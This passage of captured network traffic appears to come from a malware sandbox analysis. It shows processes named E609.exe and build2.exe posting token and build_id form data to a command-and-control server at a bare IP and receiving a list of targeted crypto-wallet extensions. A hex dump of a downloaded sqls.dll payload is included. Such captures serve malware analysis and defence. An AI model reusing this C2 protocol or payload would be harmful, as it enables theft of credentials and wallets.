                                                                                              2024-05-25 19:29:58 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------FCBFBGDBKJKECAAKKFHDCont
                                                                                              2024-05-25 19:29:59 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:29:58 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:29:59 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.449785188.114.96.34434956C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:01 UTC85OUTGET /geo.json HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: api.2ip.ua
                                                                                              2024-05-25 19:30:01 UTC912INHTTP/1.1 429 Too Many Requests
                                                                                              Date: Sat, 25 May 2024 19:30:01 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              strict-transport-security: max-age=63072000; preload
                                                                                              x-frame-options: SAMEORIGIN
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1; mode=block; report=...
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVHW%2BuDMPNg%2BTuV8Gkn1awMRTHC4BnDnvGMGByaOk73bYs2TZ7TDg5VzfVfopGYJV2Tp9HXJrNJBp4%2FqrQmheNcOpPqwBndSWzdJTnjNaeNY7GuoPb9lGvmPqN0y"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8897f0061dc47286-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-25 19:30:01 UTC457INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 36 39 30 31 30 63 30 35 31 39 32 39 35 62 30 30 31 39 34 37 30 34 30 63 35 36 31 61 31 63 30 62 30 33 30 63 30 61
                                                                                              Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#69010c0519295b001947040c561a1c0b030c0a
                                                                                              2024-05-25 19:30:01 UTC473INData Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 38 31 65 39 65 34 65 64 66 31 63 31 62 33 65 38 66 31 61 66 66 34 65 30 62 65 66 32 66 34 65 33 65 62 65 34 65 32 66 35 62 63 62 33 65 38 66 31 61 66 66 34 65 30 22 3e
                                                                                              Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#81e9e4edf1c1b3e8f1aff4e0bef2f4e3ebe4e2f5bcb3e8f1aff4e0">
                                                                                              2024-05-25 19:30:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.44978365.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:01 UTC279OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHD
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 6437
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:01 UTC6437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------HJEBGHIEBFIJKECBKFHDCont
                                                                                              2024-05-25 19:30:01 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:01 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.44978665.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:01 UTC194OUTGET /sqls.dll HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:02 UTC248INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:01 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2459136
                                                                                              Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                                                              Connection: close
                                                                                              ETag: "6650696d-258600"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-25 19:30:02 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                              Data Ascii: X~e!*FW|>|L1146
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                              Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                              Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                              Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                              Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                              Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                              Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                              Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                              2024-05-25 19:30:02 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                              Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.44979065.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:05 UTC279OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 4677
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:05 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DHIJDHIDBGHJKECBFIIDCont
                                                                                              2024-05-25 19:30:06 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:05 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.44979165.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:06 UTC279OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 1529
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:06 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------FCBFBGDBKJKECAAKKFHDCont
                                                                                              2024-05-25 19:30:07 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:07 GMT
